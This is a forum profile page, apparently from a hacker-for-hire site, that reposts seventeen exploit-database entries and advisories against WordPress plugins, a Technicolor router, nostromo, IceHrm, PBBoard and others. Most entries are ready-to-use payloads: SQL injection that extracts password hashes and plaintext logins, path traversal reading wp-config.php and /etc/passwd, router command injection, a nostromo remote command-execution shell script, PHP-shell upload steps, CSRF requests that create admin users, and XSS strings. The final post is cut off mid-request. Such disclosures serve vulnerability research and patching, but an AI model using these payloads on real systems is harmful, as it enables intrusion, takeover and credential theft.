HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Cart66 Lite WordPress Ecommerce 1.5.1.17 Blind SQL Injection
     # Date: 29-10-2014
     # Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
     # Software Link: https://downloads.wordpress.org/plugin/cart66-lite.1.5.1.17.zip
     # Category: webapps

     1. Description

     Cart66Ajax::shortcodeProductsTable() is accessible for every registered user. $postId is not escaped correctly (only HTML tags are stripped).

     File: cart66-lite\models\Cart66Ajax.php

     public static function shortcodeProductsTable() {
         global $wpdb;
         $prices = array();
         $types = array();
         $postId = Cart66Common::postVal('id');
         $product = new Cart66Product();
         $products = $product->getModels("where id=$postId", "order by name");
         $data = array();
     }

     http://security.szurek.pl/cart66-lite-wordpress-ecommerce-15117-blind-sql-injection.html

     2. Proof of Concept

     Login as a regular user (created using wp-login.php?action=register):

     <form action="http://wordpress-install/wp-admin/admin-ajax.php" method="post">
         <input type="hidden" name="action" value="shortcode_products_table">
         Blind SQL Injection: <input type="text" name="id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM wp_users WHERE ID = 1) -- ">
         <input value="Hack" type="submit">
     </form>

     This SQL will check if the first password character of user ID=1 is $. If yes, it will sleep 5 seconds.

     3. Solution:

     Update to version 1.5.2
     https://wordpress.org/plugins/cart66-lite/changelog/
     https://downloads.wordpress.org/plugin/cart66-lite.1.5.2.zip
  2. In this post we will be solving the PortSwigger lab "Stored XSS into HTML context with nothing encoded". To solve the lab we have to execute the alert function in a comment on a post.

     When we open the lab, the first thing we have to do is go to any post:

     Inside the post, we find the following:

     As we can see, we have the option to leave a comment, and several fields to fill in. So we will simply do as it says and fill in all the fields, except that in the comment field we will place a small piece of JavaScript code that runs an alert for us:

     With all the fields filled in, we simply submit the comment and we will have solved the lab:

     To see what has happened, let's go back to the post where we wrote our comment:

     And as we can see, when we open the post, the code we wrote in the comment field is executed. We have just exploited a Stored XSS.
  3. # Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File Disclosure Download
     # Google Dork: inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=
     # Date: 02/12/2014
     # Exploit Author: QK14 Team
     # Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/
     # Software Link: https://wordpress.org/plugins/google-mp3-audio-player/
     # Version: 1.0.11
     # http://wordpressa.quantika14.com/repository/index.php?id=14

     Description: This plugin is vulnerable to File Disclosure Download. Thanks to this vulnerability, a user will be able to download the configuration file config.php and extract the database access credentials from it.

     PoC: localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
  4. Product: Wireless N ADSL 2/2+ Modem Router
     Firmware Version : V2.05.C29GV
     Modem Type : ADSL2+ Router
     Modem Vendor : Technicolor
     Model: DT5130

     Bugs:

     1- Unauth Xss - CVE-2014-9142

     user=teste&password=teste&userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login

     2- Arbitrary URL redirect - CVE-2014-9143

     failrefer=http://blog.dclabs.com.br&login=Login&password=pass&refer=/index.html&user=1&userlevel=15

     3- Command Injection in ping field - CVE-2014-9144

     setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE

     --
     Ewerson Guimaraes (Crash)
     Pentester/Researcher
     DcLabs / Ibliss Security Team
     www.dclabs.com.br / www.ibliss.com.br
  5. source: https://www.securityfocus.com/bid/46864/info

     Trend Micro WebReputation API is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass the filter included in the download mechanism. Successful exploits may cause victims to download malicious files onto affected computers.

     This issue affects WebReputation API 10.5; other versions may also be vulnerable.

     http://www.example.com/dist/nmap-5.51-setup.exe?
  6. # Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability
     # Date: 12/02/2014
     # Author: Robert Cooper (robertc[at]areyousecure.net)
     # Software Link: http://www.guruperl.net/products/awppro/
     # Tested on: [Linux/Windows 7]
     # Vulnerable Parameter: group_id=
     ##############################################################

     PoC:

     http://server/cgi/client.cgi?act=list_zone&group_id=1'

     http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client--

     (Passwords are stored in plaintext)

     ##############################################################
     http://www.areyousecure.net
  7. source: https://www.securityfocus.com/bid/46868/info

     VLC Media Player is prone to a denial-of-service vulnerability. Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

     VLC Media Player 1.0.5 is vulnerable; other versions may also be affected.

     #!/usr/bin/perl
     ###
     # Title : VLC media player v1.0.5 (.ape) Local Crash PoC
     # Author : KedAns-Dz
     # E-mail : ked-h@hotmail.com
     # Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
     # Twitter page : twitter.com/kedans
     # platform : Windows
     # Impact : VLC media player Just Crashed
     # Tested on : Windows XP SP3 Français
     # Target : VLC media player v1.0.5
     ###
     # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
     # ------------
     # Usage : 1 - Create APE file ( Monkey's Audio Format )
     #      => 2 - Open APE file With VLC 1.0.5
     #      => 3 - Crashed !!!
     # ------------
     #START SYSTEM /root@MSdos/ :
     system("title KedAns-Dz");
     system("color 1e");
     system("cls");
     print "\n\n";
     print " |===========================================================|\n";
     print " |= [!] Name : VLC media player v1.0.5 (Monkey's File)      =|\n";
     print " |= [!] Exploit : Local Crash PoC                           =|\n";
     print " |= [!] Author : KedAns-Dz                                  =|\n";
     print " |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
     print " |===========================================================|\n";
     sleep(2);
     print "\n";
     # Creating ...
     my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
     open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
     print file $PoC;
     print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
     close(file);
     #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
     # Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
     # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
     # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
     # Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
     # [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah
     # Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
     # Greets All My Friends (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
     # ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers .
     # ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker .
     #===============================================================================
  8. source: https://www.securityfocus.com/bid/46880/info

     nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data.

     An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges.

     nostromo versions prior to 1.9.4 are affected.

     #!/bin/sh
     ######################################
     #                                    #
     # RedTeam Pentesting GmbH            #
     # kontakt@redteam-pentesting.de      #
     # http://www.redteam-pentesting.de   #
     #                                    #
     ######################################

     if [ $# -lt 3 ]; then
         echo "Usage: $(basename $0) HOST PORT COMMAND..."
         exit 2
     fi

     HOST="$1"
     PORT="$2"
     shift 2

     ( \
         echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
         echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
         echo "$@ 2>&1" \
     ) | nc "$HOST" "$PORT" \
       | sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'
  9. source: https://www.securityfocus.com/bid/46885/info

     SugarCRM is prone to an information-disclosure vulnerability because it fails to restrict access to certain application data.

     Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

     http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates
     http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates
  10. source: https://www.securityfocus.com/bid/46887/info

      Monkey's Audio is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

      Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.

      #!/usr/bin/perl
      ###
      # Title : Monkey's File Audio (All MPlayers) Buffer Overflow
      # Author : KedAns-Dz
      # E-mail : ked-h@hotmail.com
      # Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
      # Twitter page : twitter.com/kedans
      # platform : Windows
      # Impact : Overflow & Crash's
      # Tested on : Windows XP SP3 Français
      # Target : All Media Players
      ###
      # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
      # ------------
      # File Home : (http://www.monkeysaudio.com)
      # Error's Detected :
      # Media Player Classic v6.4.9.1 [MonkeySource.ax !0x020451a6()!] >> http://1337day.com/exploits/15581 || By KedAns-Dz
      # JetAudio v5.1.5.2 [JFACMDec.dll !0x02FA1BBD()!] >> http://packetstormsecurity.org/files/view/99200/jetaudio5152ape-overflow.txt || By KedAns-Dz
      # KMPlayer 2.9.3 [MACDec.dll !0x??????()!] >> http://packetstormsecurity.org/files/view/99190/kmplayerape-overflow.txt || By KedAns-Dz
      # VLC media player v1.0.5 [axvlc.dll !0x??????()!] >> http://1337day.com/exploits/15595 || By KedAns-Dz
      # QuickTime Player [Not Detected !!] ' Because Can not Read (APE) Files Format
      # RealPlayer [Not Detected !!] ' Because Can not Read (APE) Files Format
      # ------------
      #START SYSTEM /root@MSdos/ :
      system("title KedAns-Dz");
      system("color 1e");
      system("cls");
      print "\n\n";
      print " |======================================================|\n";
      print " |= [!] Name : Monkey's File Audio (.ape) All Players  =|\n";
      print " |= [!] Exploit : Stack Buffer Overflow                =|\n";
      print " |= [!] Author : KedAns-Dz                             =|\n";
      print " |= [!] Mail: Ked-h(at)hotmail(dot)com                 =|\n";
      print " |======================================================|\n";
      sleep(2);
      print "\n";
      # Creating ...
      my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header (16 bytes)
      open(file , ">", "Kedans.ape"); # Evil File APE (4.0 KB)
      print file $PoC;
      print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
      close(file);
      #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
      # Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
      # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
      # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
      # Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
      # [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah
      # Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
      # Greets All Bad Boys (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
      # hotturks.org : TeX * KadaVra ... all Others
      # Kelvin.Xgr ( kelvinx.net)
      #===========================================================================
  11. source: https://www.securityfocus.com/bid/46896/info

      AplikaMedia CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

      A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

      http://www.example.com/page_info.php?id_brt=[Sql_injection]
  12. source: https://www.securityfocus.com/bid/46888/info

      Wikiwig is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

      Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

      Wikiwig 5.01 is vulnerable; other versions may also be affected.

      http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E
  13. -----BEGIN PGP SIGNED MESSAGE-----
      Hash: SHA1

      +------------------------------------------------------------------------------+
      | Packet Storm Advisory 2014-1204-1                                            |
      | http://packetstormsecurity.com/                                              |
      +------------------------------------------------------------------------------+
      | Title: Offset2lib: Bypassing Full ASLR On 64bit Linux                        |
      +--------------------+---------------------------------------------------------+
      | Release Date       | 2014/12/04                                              |
      | Advisory Contact   | Packet Storm (advisories@packetstormsecurity.com)       |
      | Researchers        | Hector Marco and Ismael Ripoll                          |
      +--------------------+---------------------------------------------------------+
      | System Affected    | 64 bit PIE Linux                                        |
      | Classification     | 1-day                                                   |
      +--------------------+---------------------------------------------------------+

      +----------+
      | OVERVIEW |
      +----------+

      The release of this advisory provides exploitation details in relation to a weakness in the Linux ASLR implementation. The problem appears when the executable is PIE compiled and it has an address leak belonging to the executable.

      These details were obtained through the Packet Storm Bug Bounty program and are being released to the community.

      +------------------------------------------------------------------------------+

      +---------+
      | DETAILS |
      +---------+

      An attacker is able to de-randomize all mmapped areas (libraries, mapped files, etc.) by knowing only an address belonging to the application and the offset2lib value.

      +------------------------------------------------------------------------------+

      +------------------+
      | PROOF OF CONCEPT |
      +------------------+

      The proof of concept exploit code is available here:

      https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35472.tgz
      http://packetstormsecurity.com/files/129398

      +------------------------------------------------------------------------------+

      +---------------+
      | RELATED LINKS |
      +---------------+

      http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html

      +------------------------------------------------------------------------------+

      +----------------+
      | SHAMELESS PLUG |
      +----------------+

      The Packet Storm Bug Bounty program gives researchers the ability to profit from their discoveries. You can get paid thousands of dollars for one day and zero day exploits. Get involved by contacting us at getpaid@packetstormsecurity.com or visit the bug bounty page at: http://packetstormsecurity.com/bugbounty/

      -----BEGIN PGP SIGNATURE-----
      Version: GnuPG v1.4.11 (GNU/Linux)

      iEYEARECAAYFAlSBA04ACgkQrM7A8W0gTbG0jwCdH5CHOIDO9ELRcrPhQmf5FF4z
      TgQAn2zuwadnWdMueC8gUQPT5gCmrQyp
      =iegV
      -----END PGP SIGNATURE-----
  14. Vulnerability title: SQL Injection in PBBoard CMS
      CVE: CVE-2014-9215
      CMS: PBBoard
      Vendor: Power bulletin board - http://www.pbboard.info/
      Product: http://sourceforge.net/projects/pbboard/files/PBBoard_v3.0.1/PBBoard_v3.0.1.zip/download
      Affected version: Version 3.0.1 (updated on 13/09/2014) and before.
      Fixed version: Version 3.0.1 (updated on 28/11/2014)
      Google dork: intext:Powered By PBBoard
      Reported by: Tran Dinh Tien - tien.d.tran@itas.vn
      Credits to ITAS Team - www.itas.vn

      :: DESCRIPTION ::
      Multiple SQL injection vulnerabilities have been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection.

      :: DETAILS ::

      Attack vector

      Link 1:

      POST /index.php?page=register&checkemail=1 HTTP/1.1
      Host: server
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Referer: http://server/index.php?page=register&index=1&agree=1
      Content-Length: 29
      Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
      Connection: keep-alive
      Pragma: no-cache
      Cache-Control: no-cache

      email=<SQL Injection Here>&ajax=1

      Link 2:

      POST /index.php?page=forget&start=1 HTTP/1.1
      Host: target.org
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://server/index.php?page=forget&index=1
      Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 52

      code=0ae4e&email=<SQL Injection Here>&submit_forget=Save

      Link 3:

      POST /index.php?page=forget&send_active_code=1 HTTP/1.1
      Host: target.org
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://server/index.php?page=forget&active_member=1&send_active_code=1
      Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 57

      code=13709&email=<SQL Injection Here>&submit_active_code=Save

      :: CODE DETAIL ::
      - Vulnerable parameter: email
      - Vulnerable file: includes/functions.class.php
      - Vulnerable function: CheckEmail($email)
      - Vulnerable code:

      function CheckEmail($email)
      {
          return preg_match('#^[a-z0-9.!\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\s\'"<>@,;]+\.+[a-z]{2,6}))$#si', $email) ? true : false;
      }

      - Fix code:

      function CheckEmail($email)
      {
          // First, we check that there's one @ symbol, and that the lengths are right
          if (!preg_match("/^[^@]{1,64}@[^@]{1,255}$/", $email)) {
              // Email invalid because wrong number of characters in one section, or wrong number of @ symbols.
              return false;
          }
          if (@strstr($email,'"') or @strstr($email,"'") or @strstr($email,'>') or @strstr($email,'<') or @strstr($email,'*') or @strstr($email,'%') or @strstr($email,'$') or @strstr($email,'#') or @strstr($email,'+') or @strstr($email,'^') or @strstr($email,'&') or @strstr($email,',') or @strstr($email,'~') or @strstr($email,'!') or @strstr($email,'{') or @strstr($email,'}') or @strstr($email,'(') or @strstr($email,')') or @strstr($email,'/')) {
              return false;
          }
          // Split it into sections to make life easier
          $email_array = explode("@", $email);
          $local_array = explode(".", $email_array[0]);
          for ($i = 0; $i < sizeof($local_array); $i++) {
              if (!preg_match("/^(([A-Za-z0-9!#$%&'*+\/=?^_`{|}~-][A-Za-z0-9!#$%&'*+\/=?^_`{|}~\.-]{0,63})|(\"[^(\\|\")]{0,62}\"))$/", $local_array[$i])) {
                  return false;
              }
          }
          if (!preg_match("/^\[?[0-9\.]+\]?$/", $email_array[1])) {
              // Check if domain is IP. If not, it should be valid domain name
              $domain_array = explode(".", $email_array[1]);
              if (sizeof($domain_array) < 2) {
                  return false; // Not enough parts to domain
              }
              for ($i = 0; $i < sizeof($domain_array); $i++) {
                  if (!preg_match("/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/", $domain_array[$i])) {
                      return false;
                  }
              }
          }
          return true;
      }

      :: SOLUTION ::
      Version 3.0.1 (updated on 28/11/2014)

      :: DISCLOSURE ::
      - 11/27/2014: Inform the vendor
      - 11/28/2014: Vendor confirmed
      - 11/28/2014: Vendor releases patch
      - 12/01/2014: ITAS Team publishes information

      ::COPYRIGHT::
      Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn).

      :: DISCLAIMER ::
      THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

      :: REFERENCE ::
      - http://www.itas.vn/news/ITAS-Team-discovered-SQL-Injection-in-PBBoard-CMS-68.html
      - https://www.youtube.com/watch?v=AQiGvH5xrJg
  15. source: https://www.securityfocus.com/bid/47006/info

      Perl is prone to a remote denial-of-service vulnerability.

      An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users.

      #!/usr/bin/perl
      my @x = ("A=B","AAAA=/");
      utf8::upgrade $_ for @x;
      $x[1] =~ s{/\s*$}{};
      for (@x) {
          m{^([^=]+?)\s*=.+$};
      }
  16. IceHrm <=7.1 Multiple Vulnerabilities

      Vendor: IceHRM
      Product web page: http://www.icehrm.com
      Affected version: <= 7.1

      Summary: IceHrm is Human Resource Management web software for small and medium sized organizations. The software is written in PHP. It has community (free), commercial and hosted (cloud) solution.

      Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities including Local File Inclusion, Cross-Site Scripting, Malicious File Upload, Cross-Site Request Forgery and Code Execution.

      Tested on: Apache/2.2.15 (Unix)
                 PHP/5.3.3
                 MySQL 5.1.73

      Vulnerabilities discovered by Stefan 'sm' Petrushevski
                                   @zeroscience

      Advisory ID: ZSL-2014-5215
      Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php

      01.12.2014

      ---

      1. Local File Inclusion (LFI)
      #####################################################
      File: app/index.php

      Vulnerable code:
      ---- snip ----
      include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';

      app/?g=../&n=../../../../etc/passwd%00
      ---- snip ----

      Proof of Concept (PoC):
      http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00

      Severity: CRITICAL
      #####################################################

      2. Local File Inclusion (LFI)
      #####################################################
      File: service.php

      Vulnerable code:
      ---- snip ----
      if($action == 'download'){
          $fileName = $_REQUEST['file'];
          $fileName = CLIENT_BASE_PATH.'data/'.$fileName;
          header('Content-Description: File Transfer');
          header('Content-Type: application/octet-stream');
          header('Content-Disposition: attachment; filename='.basename($fileName));
          header('Content-Transfer-Encoding: binary');
          header('Expires: 0');
          header('Cache-Control: must-revalidate');
          header('Pragma: public');
          header('Content-Length: ' . filesize($fileName));
          ob_clean();
          flush();
          readfile($fileName);
      ---- snip ----

      Proof of Concept (PoC):
      http://zsltest/icehrm/app/service.php?a=download&file=../config.php

      Severity: CRITICAL
      #####################################################

      3. Malicious File Upload / Code Execution
      #####################################################
      File: fileupload.php

      Vulnerable code:
      ---- snip ----
      //Generate File Name
      $saveFileName = $_POST['file_name'];
      if(empty($saveFileName) || $saveFileName == "_NEW_"){
          $saveFileName = microtime();
          $saveFileName = str_replace(".", "-", $saveFileName);
      }

      $file = new File();
      $file->Load("name = ?",array($saveFileName));

      // list of valid extensions, ex. array("jpeg", "xml", "bmp")
      $allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
      // max file size in bytes
      $sizeLimit =MAX_FILE_SIZE_KB * 1024;

      $uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
      $result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
      // to pass data through iframe you will need to encode all html tags
      if($result['success'] == 1){
          $file->name = $saveFileName;
          $file->filename = $result['filename'];
          $file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
          $file->file_group = $_POST['file_group'];
          $file->Save();
          $result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
          $result['data'] .= "|".$saveFileName;
          $result['data'] .= "|".$file->id;
      }
      ---- snip ----

      Proof of Concept (PoC) method:
      1. Change the 'file_name' request parameter to the desired filename. The file will be saved in the 'data' folder.
         Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
      2. Create a malicious file (php shell) and save it with a .txt extension
      3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in the 'data' folder as dsadsa.php.txt.
      4. Access the file - http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.

      PoC example:
      1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
      2. xxx.txt contents: <?php phpinfo(); ?>
      3. Upload the filename
      4. Access the file:

      Severity: CRITICAL
      #####################################################

      4. Cross-Site Scripting (XSS)
      #####################################################
      File: login.php

      Vulnerable code:
      ---- snip ----
      <script type="text/javascript">
      var key = "";
      <?php if(isset($_REQUEST['key'])){?>
      key = '<?=$_REQUEST['key']?>';
      key = key.replace(/ /g,"+");
      <?php }?>
      ---- snip ----

      Proof of Concept (PoC):
      http://zsltest/icehrm/app/login.php?key=';</script><script>alert('zsl');</script>

      Severity: MEDIUM
      #####################################################

      5. Cross-Site Scripting (XSS)
      #####################################################
      File: fileupload_page.php

      Vulnerable code:
      ---- snip ----
      <div id="upload_form">
      <form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
      <input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
      <input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
      <input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
      <label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file" type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>
      …
      ---- snip ----

      Vulnerable parameters: id, file_group, user, msg

      Proof of Concept (PoC):
      http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert('zsl')%3C/script%3E

      Severity: MEDIUM
      #####################################################

      6. Information Disclosure / Leaking Sensitive User Info
      #####################################################
      Users'/employees' profile images are easily accessible in the 'data' folder.

      Proof of Concept (PoC):
      http://192.168.200.119/icehrm/app/data/profile_image_1.jpg
      http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id

      Severity: LOW
      #####################################################

      7. Cross-Site Request Forgery (CSRF)
      #####################################################
      All forms are vulnerable to CSRF.

      Documents library:
      http://localhost/icehrm/app/service.php
      POST document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument

      Personal info:
      http://localhost/icehrm/app/service.php
      GET t=Employee a=ca sa=get mod=modules=employees req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}

      Add new admin user:
      http://localhost/icehrm/app/service.php
      POST username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User

      Change password of user:
      http://localhost/icehrm/app/service.php?
      GET t=User a=ca sa=changePassword mod=admin=users req={"id":5,"pwd":"newpass"}

      Add/edit modules:
      http://localhost/icehrm/app/service.php
      POST t=Module&a=get&sm=%7B%7D&ft=&ob=

      Severity: LOW
      #####################################################
  17. ##############################################################################
      # Exploit Title : PBBoard CMS Stored xss vulnerability
      # Author : Manish Kishan Tanwar
      # Vendor : http://www.pbboard.info/
      # version affected: all
      # Date : 7/12/2014
      # Discovered @ : INDISHELL Lab
      # Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
      # email : manish.1046@gmail.com
      ##############################################################################

      ////////////////////////
      /// Overview:
      ////////////////////////
      Program PBBoard is an interactive Forum management program, Dialogic Free classified software, Free and open source.

      ///////////////////////////////
      // Vulnerability Description:
      ///////////////////////////////
      A stored xss vulnerability exists in the "send private message" module: a user can send an xss-crafted private message to another user, and when the receiver opens the message the xss payload will execute.

      //////////////////////////////
      /// Proof of Concept: -
      //////////////////////////////
      Go to "inbox", click "compose message", type username, title and message body, intercept the request and change the content of the "text" parameter to the xss payload. When the receiver opens the message, the xss payload will execute.

      Proof image:-
      http://oi57.tinypic.com/112d5cx.jpg

      //////////////////////
      ///Demo POC Request///
      //////////////////////
      POST /PBBoard_v3.0.1/index.php?page=pm_send&send=1&start=1 HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://127.0.0.1/PBBoard_v3.0.1/index.php?page=pm_send&send=1&index=1&username=ica
      Cookie: PowerBB_lastvisit=1417951132; PowerBB_username=ica; PowerBB_password=8a2d334536b2f4146af8cf46acd85110; security_level=0;PHPSESSID=thouojqch98pigioioepn8n2h1
      Connection: keep-alive
      Content-Type: multipart/form-data; boundary=---------------------------147872036312473
      Content-Length: 670

      -----------------------------147872036312473
      Content-Disposition: form-data; name="to[]"

      ica
      -----------------------------147872036312473
      Content-Disposition: form-data; name="title"

      hi
      -----------------------------147872036312473
      Content-Disposition: form-data; name="text"

